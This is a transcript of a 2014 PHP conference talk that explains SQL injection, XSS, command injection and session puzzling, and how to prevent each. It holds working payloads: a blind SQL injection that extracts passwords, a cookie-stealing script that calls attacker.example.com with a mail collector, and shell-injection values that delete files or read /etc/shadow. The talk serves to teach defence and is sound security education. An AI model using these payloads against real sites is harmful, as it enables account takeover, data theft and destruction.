hacking sites for fun and profit
DESCRIPTION
How common exploits are used to take over a website, how to identify those vulnerabilities in your own code and prevent your site from being compromised. The bad guys know all the techniques, but it doesn't mean we should make it any easier to take over sites. Preventing some vulnerabilities is done by keeping these issues in mind as you're developing your code.TRANSCRIPT
![Page 1: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/1.jpg)
Hacking Sites for Fun and Profit
SkiPHP 2014
David Stockton
![Page 2: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/2.jpg)
or How to Hack Websites and Prevent Your Site from Being
Hacked
![Page 3: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/3.jpg)
or How I Learned to Stop Worrying and Love the SQL Injection
Web
![Page 4: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/4.jpg)
What this is for• Learn how common exploits are
done and how to identify code that is vulnerable
• Learn how to fix code that is susceptible to these attacks
• Learn how to attack your own code and your own sites so you can fix them
![Page 5: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/5.jpg)
What this is not for• Hacking or attacking sites
that you do not have permission to attack !
• Don’t do it.
![Page 6: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/6.jpg)
The Code
• The code I am showing you is similar to real code I’ve seen in real projects, but it was written specifically for this presentation.
![Page 7: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/7.jpg)
Exploit 1:• SQL injection
!
• select * from users where username = '$_POST['username']';
![Page 8: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/8.jpg)
SQL Injection• $_POST['username'] = “' OR 1=1; --;”;
!
!
• select * from users where username = '' OR 1=1; --;';
![Page 9: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/9.jpg)
SQL Injection• $_GET
• $_POST
• $_REQUEST
!
• what else...
![Page 10: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/10.jpg)
SQL Injection• $_COOKIE
!
• values from the database
!
• Some parts of $_SERVER
![Page 11: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/11.jpg)
Errors can help attackers• Showing SQL errors can help attackers fix SQL injection
attempts
!
• Other errors can help in other ways (some show passwords)
!
• Turn off display_errors in production, but log errors always
![Page 12: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/12.jpg)
Blind SQL injection• Make calls that take
varying amounts of time to run. Use the time to determine the answers to questions about the systems you are attacking.
![Page 13: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/13.jpg)
Blind SQL injection
• http://news.org/news.php?id=5
• http://news.org/news.php?id=5 and 1=1
• http://news.org/news.php?id=5 and 1=2
![Page 14: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/14.jpg)
Determine DB version
• news.php?id=5 and substring(@@version, 1,1)=5
![Page 15: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/15.jpg)
Subselects?
• news.php?id=5 and (select 1) = 1
![Page 16: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/16.jpg)
Access to other databases/tables
• news.php?id=12 and (select 1 from mysql.user limit 0,1) = 1
![Page 17: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/17.jpg)
Guessing tables
• news.php?id=6 and (select 1 from users limit 0,1) =1
![Page 18: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/18.jpg)
Guessing column names
• news.php?id=11 and (select substring(concat(1, password),1,1) from users limit 0,1)=1
![Page 19: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/19.jpg)
Guessing data• news.php?id=4 and
ascii(substring((SELECT concat(username, 0x3a, password) from users limit 0,1),1,1))>80
!
• Increment to guess values letter by letter
![Page 20: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/20.jpg)
Preventing SQL Injection
● mysql_real_escape_string
● Prepared statements
● Input validation and whitelists
![Page 21: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/21.jpg)
Exploit 2:
• XSS
!
• Cross-site Scripting
![Page 22: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/22.jpg)
What is it?
• User supplied code running in the browser
![Page 23: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/23.jpg)
So? It’s their browser
• Yep, but it may not be their code.
![Page 24: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/24.jpg)
So? It’s their browser
• It may not be your code, but it might call your code in a way you don’t want
![Page 25: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/25.jpg)
XSS Code
<img src=”<?php echo $_POST[‘image’];?>”>
<.. javascript to open the print dialog ..>
![Page 26: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/26.jpg)
So what?• What if we post code into
$_POST[‘image’]
!
● Steal session cookies ● Call Javascript APIs to causes actions
on the server (CSRF) ● Post forms as the user
![Page 27: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/27.jpg)
The payload: $_POST[‘image’]
/images/add.gif"><script type="text/javascript">alert('xss!');</script><img src="
![Page 28: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/28.jpg)
Ermahgerd er perperp.
![Page 29: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/29.jpg)
Ooh, that’s soooo malicious, I’m totally shaking right now• Fine. How about this.
!
!
• image = /images/add.gif"><script type="text/javascript">document.write('<img src="http://attacker.example.com/session.php?' + document.cookie + '">'); </script><img src="
![Page 30: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/30.jpg)
WTH did that do?
• Javascript ran FROM the site we’re attacking and it sent your site cookies to a script the attacker controls.
![Page 31: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/31.jpg)
So you stole my cookie. So what?
• Here’s what. <?php $session = $_GET['PHPSESSID']; $body = 'Got session: ' . $session; mail('[email protected]', 'Session Captured', $body);
![Page 32: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/32.jpg)
Oooh, you emailed my cookie... So...
![Page 33: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/33.jpg)
Now it’s my turn...
![Page 34: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/34.jpg)
Why this matters• Sites identify and authenticate
users with session.
• I have identified myself as you. I am now logged in as you and can do anything you can do on the site.
![Page 35: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/35.jpg)
Ok, so I can steal my own session
• Here’s how to use it against someone.
![Page 36: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/36.jpg)
The first part of the attack• Create an email to a link on the
attacking site that posts the code to the site under attack. Send the email to the victim.
!
• They click the link, you steal their session.
![Page 37: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/37.jpg)
What else can I do?
• Cross Site Request Forgery (CSRF)
• Causing actions to happen on the user’s behalf
• Purchasing things, changing passwords, creating accounts, etc.
![Page 38: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/38.jpg)
How to prevent?
• Escape output
• Whitelist URLs, domains, input
• Make the print page lookup and use image paths from a trusted source (database maybe?)
![Page 39: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/39.jpg)
Prevent CSRF
• Use a CSRF token.
• Disallow requests that don’t contain the correct token.
![Page 40: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/40.jpg)
Exploit prevention in general
• Filter input
• Escape output
• This works for SQL injection, XSS and more...
• in general
![Page 41: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/41.jpg)
Exploit 3: Command injection
● shell_exec
● exec
● passthru
● system
● `some command`
![Page 42: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/42.jpg)
PHP Web File Browser
• Supposed to allow viewing of files within the web directories
• $files = shell_exec(‘ls -al ’ . $_GET[‘dir’]);
![Page 43: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/43.jpg)
What’s the danger?
• $_GET[‘dir’] = ‘.; rm -rf / *’;
• Or whatever.
• cat /etc/passwd; cat /etc/shadow
![Page 44: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/44.jpg)
How to prevent?• If you must use user input in a command,
use escapeshellarg()
• $dir = escapeshellarg($_GET[‘dir’]);
• $files = shell_exec(‘ls -al ‘ . $dir);
• Validate that the input is allowed
![Page 45: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/45.jpg)
Other types of injection● Code (eval)
● Regex
● Log
● LDAP
![Page 46: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/46.jpg)
Other exploits● Authentication / Session management ● Information disclosure ● Sensitive data exposure ● File upload flaws ● Unchecked redirects ● Leftover debug code ● Session fixation ● Internal threats ● Privacy Violation (password in logs,
etc)
![Page 47: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/47.jpg)
Mitigation• Validation on the client
• Reject invalid requests entirely, log intrusion attempt
• Principle of least privilege
• Filter input, escape output
![Page 49: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/49.jpg)
Session Puzzling
• Making requests to privileged and unprivileged pages in a particular order that can escalate privileges of the attacker
![Page 50: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/50.jpg)
How it could work
• Page requiring authentication looks for ‘user’ in session to determine authentication
![Page 51: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/51.jpg)
Session Puzzling
• Login -> forgot password page sends information via ‘user’ in session
![Page 52: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/52.jpg)
Put it together
• Hit pages quickly in this order:
• Login -> forgot password / privileged page
• Privileged page sees ‘user’ and allows attacker in
![Page 53: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/53.jpg)
How was this found?
• By accident, via web crawler getting access to privileged pages
![Page 54: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/54.jpg)
Questions?
• Please rate this talk.
• https://joind.in/10446